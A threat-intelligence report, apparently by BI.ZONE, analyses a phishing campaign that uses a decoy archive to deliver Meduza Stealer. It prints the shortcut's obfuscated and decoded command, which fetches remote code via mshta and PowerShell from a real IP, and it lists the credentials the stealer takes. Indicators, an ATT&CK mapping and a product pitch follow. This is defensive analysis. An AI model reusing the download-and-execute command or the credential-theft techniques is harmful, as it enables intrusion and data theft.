Stone Wolf employs Meduza Stealer to hack Russian companies
BI.ZONE Threat Intelligence reports an increase in criminal activity employing commercial malware available on underground resources. Recently, the researchers identified a malicious campaign by a cluster later dubbed Stone Wolf. The adversaries send out phishing emails on behalf of a legitimate provider of industrial automation solutions. The goal of the attackers is to deliver Meduza Stealer to the infrastructures of their interest.
Cybercriminals often disseminate phishing emails on behalf of large well‑known organizations. Recognizable logos and other elements of the brands’ visual identity help adversaries gain user trust and boost the chances for their malicious messages to be opened. It is important to remember that the brands cannot be liable for the actions of cybercriminals and associated damage.
- Adversaries continue to use archives with both malicious files and legitimate attachments which serve to distract the victim. This fact underscores the importance of raising awareness of adversary methods.
- By using the names and data of real organizations, attackers have a greater chance to trick their victims into downloading and opening malicious attachments. This tendency indicates the need for employees to undergo regular cybersecurity training.
- Attackers keep on expanding their arsenal of commercial malware. This once again highlights the importance of monitoring underground resources.
The adversaries disseminate an archive named Dostavka_Promautomatic.zip. The archive contains:
- a
.p7sdigital signature file - a
.docxlegitimate document used as a decoy Scan_127-05_24_dostavka_13.05.2024.pdf.url, a malicious link to Meduza Stealer
Decoy document
Opening the malicious link triggers the loading and execution of a file hosted on a remote SMB server.
The file is a Windows shortcut that runs the following command:
SyncAppvPublishingServer.vbs
;520,526,515,527,508,443,515,527,527,523,469,458,458,460,468,462,457,460,461,463,457,462,462,457,466,460,469,462,461,460,466,458,494,510,508,521,506,460,461,466,456,459,464,506,461,463,506,511,522,526,527,508,529,518,508,506,460,462,457,459,464,457,461,459,461,463,457,512,531,512|%{$p+=[char]($_-411)};$p | powershell –
Performing the subtraction operation transforms the command as follows:
SyncAppvPublishingServer.vbs ; mshta http://193.124.33[.]71:3217/Scan_127-05_24_dostavka_13.05.2024.exe | powershell -
The command downloads an HTA file named Scan_127-05_24_dostavka_13.05.2024.exe from a remote network location, executes the file with the help of MSHTA, and runs the command through the PowerShell interpreter. The command runs via WScript.Shell.Run([command]) and contains an AES‑encrypted payload for the PowerShell interpreter. The payload is decrypted at runtime and executed.
The decrypted script does the following:
- downloads the document from the remote network server
http://193.124.33[.]71:3217/Scan_127-05_24_dostavka_13.05.2024.pdfand runs it - downloads In2al5d P3in4er from the network server
http://193.124.33[.]71:3217/scp231.exeand runs it
The files are saved into the folder C:\Users\[user]\Appdata\Roaming. Then the script searches for the file Scan_127-05_24_dostavka_13.05.2024.pdf.url and replaces it with the downloaded PDF file.
In2al5d P3in4er is used for downloading and running Meduza Stealer. This malware as a service first appeared on underground resources in June 2023. One‑month, three‑month, and lifetime subscriptions can be purchased for $199, $399, and $1,199, respectively. In March 2024, additional options became available, including the loader (presumably, In2al5d P3in4er) and a dedicated server with а range of variables (the number of cores, size of RAM, and amount of disk space).
Meduza Stealer advert in a Telegram channel
Purchasers receive a builder and a web panel that enables them to monitor data collected from victim devices. According to the Meduza Stealer developers, the executable file contains an anti‑CIS module which restricts attacks in the region. However, there is no such restriction in the malware sample obtained by the BI.ZONE Threat Intelligence team.
If the malware cannot connect to the C2 server, the program terminates.
In the compromised system, the stealer retrieves data on the operating system version, device name and time zone, RAM capacity, processor, graphic adapter, screen resolution (with a screen snapshot), as well as the device’s public IP address by sending a query to https://api.ipify[.]org.
The stealer also collects the following data:
- account credentials saved in Outlook
- account credentials from browsers (Chrome, Edge, Comodo, Atom, Yandex, etc.)
- account credentials from crypto wallets (Coinomi, Exodus, Ethereum, etc.)
- list of installed applications by accessing the registry hive
HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall - Telegram and Steam sessions, a Discord token
- account credentials from password managers (1Password, GAuth, NordPass, etc.)
- Windows Credential Manager and Windows Vault data retrieved via WinAPI functions (
VaultEnumerateVaults,VaultOpenVault) - list of active processes retrieved via WinAPI functions (
CreateToolhelp32Snapshot,Process32FirstW,Process32NextW)
The collected data is sent to the control server via TCP.
cd745ddc3f772137945a1ed3343765f178491f495a2f3af0ba7c4bd97ca4bca0864cbc0ec0418da6bb14d95713994eb0f38be289c3c7883bde51a9f1408d06bbaf2386431856e1b8e41a0f94210c42919498250506fffde57886b1e3e6b1f0f4dd38bf69a941ef4637f874016eccab7907499e7afddf06ed0bd7f6a942931d9f095b37644804d322ca470d91345ba784dad15c8f1f5a6df20ee7630abcf013f751d01bc7e689dd5aa78c622b0e53d979a6c1cab7b74d61b61c6d014680ade46946a83fa47ebb0a533223ebd988c8a5408e7f9a861d4d9fd1addbe1bad6c41ea08e99941fc79650581787813b87334cfcd17ac30839483a42b553cdbae49bc76f0414447d166298fd10bbe5d1ea60462fb24cb0a4256df988d50246f5b0b4d284c2e0e3b7bfd21f5c6b32b21a3137004f3ddb43cc5613fe1a7245473c45ce529aed2a5e3ce5bb91db9641975229318e5901a62b9e1b73a6f0ba15c15acb2049c535171edb79c9beda0462e6541d5a4da3b8ee7d8c06fca20e7cd4621e60de50b8989638e5c290c38eecf8849607d9107f3d69a38d3babb67c77382e2f3376d70030f822cbc92ec6f492c5b76291a921214ac65e5b81c3bc2f545d576e1dd15635ac836822fc7f214d6e090a2bc5d1a4839903438d036bd4da5c1729dca2d882f1d05158ad6e03aeaf6a677d049d0f11c2a86eb8768748fc37ee6844009dec5c01de50fa9a097b0422fe22031f46402cf045efff32daf384fa89b6aca6061551e53b4810fb9a74764797c66226478ca54af5b7f14c0fb78fa711cb87eb11c8ed7f32c4baf3c05a9d48a328de6d78f4e8d62caa453045ac99aaf35cbb2273e461bc9a951be6b17f713c9866e17aa71d9e1c4615540b9851a956a23b8fe9dee7c2ddbb4a085012ecc82932da446a9a30f398fcba1ba7df7d9d6f7076294301ea1b691e15ea86c8ea6c0d6db8241423b7d731cf2dd398c69ef16e9bfe29e32d7fd8acbe599e8e9605e02e0f6c284ece747fa393acb3b2e952f12b3ca738026483111605f55da61ab7a5e71b45b6884882024ea8135921dca7ae9017ba5e14b647a4f99afbfde2dd0137e872ef20a6454776f5f896d03053327070fadf25c7831cddb001ec9c59da49bbf4bed1308e20775bab4c7558857677a678c4210d0cd4be6663ac97c5cbb2f0044d61a793d2cebe33411ecf59e2613b615663e680b28c92ddd7e657014bb108f4779325b34a02a06bbc7d3cbbdb324747afec51d0a2441925be486a970731749d2839cb8757e8e6136d80747c59c6145e8197aba1a0fb305386ca84635d1fc251238a9379c08f3384f43274a653d01bf4bad4c810a71a679de54927db80c34f1e8c9b2bd5efa6f0f4c3c8fb5cfda31535841b6bd539360e19c71ba9d880e4b532ea375242878c2a18b99875d8922657caa813e5bfaf4094f252362c1b9e5d46a866a52f03dca80aa812d5637a8d2304527603445f78e79b855c26a234763f42527860fc45c04b377b78fa21a9803709e248f6c0d56ba42dd15cc392f55e79e3ca4b88a3a15dcff255edb80ca44e82a758f9ea53a2cc12525d47cee2442ce10695e29830a77d38d4af1e24d6881203743664abc4ad9a8c97c0f2193.124.33[.]71109.120.177[.]48
| Tactic | Technique | Procedure |
|---|---|---|
| Initial Access |
Phishing: Spearphishing Attachment |
Uses phishing emails with malicious attachments to gain initial access |
| Execution |
User Execution: Malicious File |
Prompts the victim to run the malicious file to initiate the compromise process |
|
Command and Scripting Interpreter: PowerShell |
Employs PowerShell to run commands and scripts |
|
|
Command and Scripting Interpreter: Visual Basic |
Employs VBScript to run commands and scripts |
|
| Defense Evasion |
Deobfuscate/Decode Files or Information |
Deobfuscates the commands and scripts being launched |
|
Impersonation |
Sends out phishing emails on behalf of a real organization |
|
|
Masquerading: Double File Extension |
Uses double extension to masquerade the malicious file |
|
|
System Binary Proxy Execution: Mshta |
Uses MSHTA to run malicious files |
|
| Credential Access |
Credentials from Password Stores: Credentials from Web Browsers |
Retrieves authentication data from web browsers |
|
Credentials from Password Stores: Windows Credential Manager |
Retrieves authentication data from Windows Credential Manager |
|
|
Credentials from Password Stores: Password Managers |
Retrieves authentication data from password managers |
|
|
Unsecured Credentials: Credentials In Files |
Retrieves authentication data from files |
|
|
Unsecured Credentials: Credentials in Registry |
Retrieves authentication data from the registry |
|
| Discovery |
Process Discovery |
Collects information about the running processes |
|
System Information Discovery |
Collects information about the compromised system |
|
| Command and Control |
Non-Application Layer Protocol |
Uses TCP to communicate with the C2 server |
|
Ingress Tool Transfer |
Transfers the malware to the compromised system |
|
| Exfiltration |
Automated Exfiltration |
Automatically exfiltrates the collected data |
|
Exfiltration Over C2 Channel |
Transfers the collected data to the C2 sever |
The BI.ZONE EDR rules below can help organizations detect the described malicious activity:
win_execution_or_open_file_with_double_extensionwin_use_mshta_to_run_hta_from_urlwin_access_to_ip_detection_servicewin_possible_browser_stealer_activitywin_suspicious_access_to_password_manager_files
Adversaries can bypass preventive security solutions and penetrate the infrastructure unnoticed. It is crucial to neutralize threats before they cause significant damage to business. To protect your company against advanced threats, we recommend implementing endpoint detection and response practices; for instance, BI.ZONE EDR. The service enables early detection of attacks and immediate incident response, either automated or manual.
To stay ahead of threat actors, you need to be aware of the methods they use when attacking various infrastructures. Understanding the real threat landscape is a massive advantage against adversity. For this purpose, we would recommend that you leverage the data from the BI.ZONE Threat Intelligence portal. The solution provides information about the current attacks, threat actors, their methods and tools. This data helps to ensure the precision of your security solutions, which in turn accelerates incident response and protects your company from the most critical threats.